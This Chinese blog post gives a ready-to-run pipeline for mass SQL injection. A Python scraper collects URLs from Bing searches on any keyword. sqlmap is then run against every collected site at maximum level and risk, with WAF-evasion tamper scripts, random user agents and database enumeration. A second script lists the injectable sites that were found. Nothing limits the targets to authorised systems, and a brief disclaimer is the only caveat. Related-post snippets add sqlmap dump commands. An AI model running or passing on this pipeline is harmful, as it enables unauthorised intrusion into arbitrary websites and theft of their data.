python+sqlmap

已于 2024-10-24 21:50:33 修改
阅读量270 收藏 4
点赞数 5
文章标签: 1024程序员节 sql python
于 2024-10-24 21:49:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_45139674/article/details/143220486
版权

提前声明,仅是技术分享,他人用作危险行为与我无关!!!

sea.py

import requests  
from lxml import etree  
import time  

def create_requests(page, data):  
    url = f"https://www.bing.com/search?q={data}&first={page}"  
    
    header = {  
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",  
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",  
        "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8"  
    }  
    
    try:  
        response = requests.get(url=url, headers=header, timeout=10)  
        response.encoding = "utf-8"  
        print(f"状态码: {response.status_code}")  
        print(f"当前URL: {url}")  
        return response.text  
    except Exception as e:  
        print(f"请求出错: {e}")  
        return None  

def parse_data(context):  
    if not context:  
        return  
    
    try:  
        parse = etree.HTML(context)  
        
        # 打印所有可能包含链接的元素,用于调试  
        print("\n检查页面元素:")  
        all_links = parse.xpath('//a/@href')  
        print(f"找到的所有链接数量: {len(all_links)}")  
        
        # 使用更通用的xpath表达式  
        urls = parse.xpath('//li[@class="b_algo"]//h2/a/@href')  
        
        if not urls:  
            print("尝试备用xpath...")  
            # 尝试其他可能的xpath路径  
            urls = parse.xpath('//div[@class="b_title"]//a/@href')  
        
        if not urls:  
            print("尝试更多备用xpath...")  
            urls = parse.xpath('//h2//a/@href')  
        
        if urls:  
            print(f"\n找到 {len(urls)} 个有效URL")  
            # 打开文件准备写入  
            with open("urls.txt", "a", encoding='utf-8') as f:  
                for url in urls:  
                    # URL过滤  
                    if any(skip in url.lower() for skip in [  
                        "bing.com",  
                        ".jpg", ".jpeg", ".png", ".pdf",  
                        ".gov.cn",  
                        "javascript:",  
                        "microsoft.com",  
                        "/search?",  
                        "go.microsoft.com"  
                    ]):  
                        continue  
                    
                    # 写入URL  
                    f.write(url + "\n")  
                    print(f"已写入: {url}")  
        else:  
            print("未找到符合条件的URL")  
            # 保存页面内容用于调试  
            with open("debug.html", "w", encoding='utf-8') as f:  
                f.write(context)  
            print("已将页面内容保存到debug.html文件中")  
                
    except Exception as e:  
        print(f"解析出错: {e}")  

def main():  
    try:  
        # 清空或创建文件  
        with open("bing_urls.txt", "w", encoding='utf-8') as f:  
            f.write("")  
            
        data = input("请输入Bing搜索关键词: ")  
        page_multiple = int(input("请输入爬取页数的倍数: "))  
        
        print("----------------------开始抓取----------------------")  
        
        for page in range(0, page_multiple * 10, 10):  
            print(f"\n正在抓取第 {(page//10)+1} 页...")  
            context = create_requests(page, data)  
            if context:  
                parse_data(context)  
                time.sleep(1)  
            
        print("\n----------------------抓取完毕----------------------")  
        
    except KeyboardInterrupt:  
        print("\n程序被用户中断")  
    except Exception as e:  
        print(f"程序执行出错: {e}")  

if __name__ == '__main__':  
    main()

ex.py

import os  
import shutil  
from datetime import datetime  

def get_exists(path):  
    successful_injections = []  
    
    print(f"开始分析目录: {path}")  
    print("="*50)  
    
    for root, dirs, files in os.walk(path):  
        log_path = os.path.join(root, "log")  
        
        if os.path.isfile(log_path):  
            if os.path.getsize(log_path) == 0:  
                print(f"删除空结果: {root}")  
                shutil.rmtree(root)  
            else:  
                successful_injections.append(root)  
                print(f"发现注入点: {root}")  
                
                # 尝试读取更多信息  
                try:  
                    with open(log_path, 'r', encoding='utf-8') as f:  
                        first_line = f.readline().strip()  
                        print(f"详细信息: {first_line}")  
                except Exception as e:  
                    print(f"无法读取详细信息: {e}")  
                
                print("-"*30)  
    
    return successful_injections  

if __name__ == '__main__':  
    # 获取当前脚本所在目录  
    current_dir = os.path.dirname(os.path.abspath(__file__))  
    # 构造results目录的路径  
    results_dir = os.path.join(current_dir, "results")  
    
    print(f"开始时间: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")  
    print("="*50)  
    
    # 检查results目录是否存在  
    if not os.path.exists(results_dir):  
        print(f"Error: 当前目录下未找到results文件夹")  
        exit()  
    
    try:  
        successful_points = get_exists(results_dir)  
        
        print("\n扫描统计:")  
        print(f"总共发现: {len(successful_points)} 个注入点")  
        
        # 将结果保存到当前目录下的文件  
        output_file = os.path.join(current_dir, 'injection_results.txt')  
        with open(output_file, 'w', encoding='utf-8') as f:  
            f.write(f"扫描时间: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n")  
            f.write(f"发现注入点数量: {len(successful_points)}\n\n")  
            for point in successful_points:  
                f.write(f"{point}\n")  
        
        print(f"\n结果已保存到: {output_file}")  
        
    except Exception as e:  
        print(f"执行出错: {e}")  
    
    print("\n完成时间:", datetime.now().strftime('%Y-%m-%d %H:%M:%S'))

顺序就是

1、启动sea脚本,按照提示输入相关信息,将输出一个urls脚本

2、使用sqlmap 

sqlmap -m urls.txt --batch --random-agent --level 5 --risk 3 --threads 10 --dbs --output-dir=./results --tamper="space2comment,between"

  • -m urls.txt: 从urls.txt文件中读取多个目标URL

  • --batch: 自动选择默认选项,不需要用户手动输入

  • --random-agent: 使用随机User-Agent,避免被封锁

  • --level 5: 设置测试等级为最高级别5(范围1-5)

  • --risk 3: 设置风险等级为最高级别3(范围1-3)

  • --threads 10: 使用10个线程进行扫描

  • --dbs: 枚举所有数据库名

  • --tables: 枚举所有表名

  • --columns: 枚举所有列名

  • --output-dir=./results 输出结果在当前文件夹

  • --delay=1 # 请求延时

  • --tamper="space2comment,between" # 使用两个tamper脚本来绕过WAF

3、启动ex脚本,将得到sql可注入的点。

再次声明,技术虽好,但合理用之!!!

sqlmap 执行后打开其它程序
大哥一声吼
08-24 1404
从上面的解决方法也可以看出,出现这种问题,其实就是在安装了vscode、pycharm之后,默认修改了python 文件的默认关联打开方式,导致直接执行sqlmap 失败;对应的方法当时是如上所述,接触二者之间的关联即可。
sqlmap+python
10-23
SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。 资源包括sqlmap和运行所需的python安装包
day9-sql注入之sqlmap工具使用
最新发布
qq_68505310的博客
03-29 985
其实没啥好总结的,用法就是这么个用法,还是得多练,over。
Python自动化SQL注入和数据库取证工具库之sqlmap使用详解
Rocky006的博客
05-14 1001
概要 在网络安全领域,SQL注入仍然是最常见的攻击之一。sqlmap是一个开源的自动化SQL注入和数据库取证工具,它提供了广泛的功能来检测和利用SQL注入漏洞。本文将详细介绍sqlmap的安装、特性、基本与高级功能,并结合实际应用场景,展示其在网络安全测试中的应用。
PythonSQLMap:自动SQL注入和渗透测试工具示例详解
naer_chongya的博客
07-20 2352
在网络安全领域中,渗透测试是一项重要的任务。其中,SQL注入攻击是最常见的一种攻击方式之一。为了简化渗透测试过程中的繁琐操作,开发者们设计了各种自动化工具。其中,SQLMap是一款使用Python编写的强大工具,用于进行自动化的SQL注入和渗透测试。本文将详细介绍SQLMap的使用方法,包括Python语言环境的搭建、SQLMap的安装和配置、基本使用方法以及具体示例,以帮助读者更好地理解和运用这一强大的工具。
sqlmap工具的使用 (超详细附工具版)_python sqlmap
m0_61408947的博客
04-12 1031
python sqlmap.py -u “http://x.x.x.x/” --data=uname=admin&passwd=admin&submit=Submit -D “库名” -T “表名” -C “字段名” --dump。python sqlmap.py -u “http://x.x.x.x/” --data=uname=admin&passwd=admin&submit=Submit -D “库名” -T “表名” --columns。id=1*” -D “库名” --tables。
Python2.7+SqlMap
04-23
使用sqlmap首先必须的安装python2.7的环境,高于这个版本则不能安装,博主已经曾经浪费了一晚上验证了这个事实,还有一个sqlmap使用非常方便,如果想咨询web渗透的可以进我的网站www.imkebi.net
python+sqlmap.zip
12-15
本压缩包中含有python2.7.17和sqlmap,亲测可用。sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试...
sqlmap,一个实用的 Python 自动化SQL注入库!
qq_67508379的博客
05-15 1135
在网络安全领域,SQL注入仍然是最常见的攻击之一。sqlmap是一个开源的自动化SQL注入和数据库取证工具,它提供了广泛的功能来检测和利用SQL注入漏洞。本文将详细介绍sqlmap的安装、特性、基本与高级功能,并结合实际应用场景,展示其在网络安全测试中的应用。sqlmap允许用户定义具体的注入点,甚至自定义SQL查询来提取数据。这个命令指定从users表中提取name和password列,但仅限于那些role列为admin的行。
buuctf+lovesql+++sqlmap
11-29
python sqlmap.py -u http://18a64bdf-b7b2-44a9-8935-83536c6010e4.node4.buuoj.cn:81/index.php?id=1 -D mysql --tables ``` 其中,-u参数指定了目标URL,-D参数指定了要查询的数据库名称,--tables参数表示要查看...
sqlmap-需要安装python环境.rar
06-29
SQLMapPython环境下的渗透测试利器》 SQLMap是一款强大的、自动化的SQL注入工具,主要用于检测和利用SQL注入漏洞,以实现对数据库的完全控制。这个名为"sqlmap-需要安装python环境.rar"的压缩包文件,显然是...
sqlmap+python2.7.1
10-16
sqlmap注入安装程序,主要包含python2.7.1版本以及sqlmap包。
sqlmap软件和Python2.7.2环境安装
12-26
sqlmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。 注意:sqlmap只是用来检测和利用sql注入点的,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。 由于sqlmap是运行在python环境上的,所以,我们需要在电脑上先安装python
Python-使用Charles和sqlmapapi进行自动化SQL注入
08-10
使用Charles和sqlmapapi进行自动化SQL注入
Python入门:函数封装之python调用sqlmap
foryouslgme的博客
06-21 3678
该案例是想通过python来简化sqlmap的使用,故会使用到查找sqlmap路径,以及在当前路径下找到sqlmap.py文件,这里肯定会有人要问了,为什么不使用list加下标的方式提取sqlmap.py文件呢?首先我们需要考虑的是,以下标的方式提取文件是可变的,如:在sqlmap文件夹中多了一个文件,这时候,你想取到目标文件的下标可能会变化,所以不能使用下标来提取目标文件,所以最简单的办法就是使用
python写一个自己的sqlmap(重学sql注入版)
weixin_50847719的博客
05-31 630
昨天找到一个无回显的站不想手工(只要还是菜和懒),就突发奇想写个这东西,一边打cs一边写,队友太坑了,按照自己思路很就把代码一股脑写好了,但是本人代码习惯不好,不是写一个函数测一个函数,测试的时候搞了一个通宵一直找不到错误,哈哈哈,判断函数就写错了,然后恍然大悟,url我直接写的%20 %27这种,因为之前都是浏览器测的,而脚本不是像浏览器一样先进行一次url解码所以错了 用到的库 import requests,base64,time,threading,logging,datetime,math,re
python使用sqlmap API检测SQL注入
weixin_30832405的博客
12-11 298
sqlmapapi.py -s 在服务端启动服务@get127.0.0.1:8775/task/new 新建一个任务@get127.0.0.1:8775/task/<taskid>/delete 删除一个指定<taskid>任务@get127.0.0.1:8775/admin/<taskid>/list 查看所有任务列表,并显示扫描的状...
python调用sqlmapapi实现批量扫描网站
weixin_43996007的博客
02-22 4593
python调用sqlmapapi实现批量扫描网站 1、介绍 众所周知,sqlmap是一个非常强大的注入扫描工具。利用它可以自动化检测和利用SQL注入缺陷以达到接管控制网站后台数据库的目的。 但是再强大的工具总会存在一些缺陷的地方——比如每进行一个扫描任务,都需要再次开启一个命令行;使用相同的参数扫描网站时需要多次输入,浪费时间,效率低下。不过好在sqlmap提供了一个强大的api可以弥补这些缺陷。 sqlmapapi分为服务端和客户端,默认端口为8775。使用方法如下: 其中,-p参数可以指定端口号,-
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

刚数学的木头

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值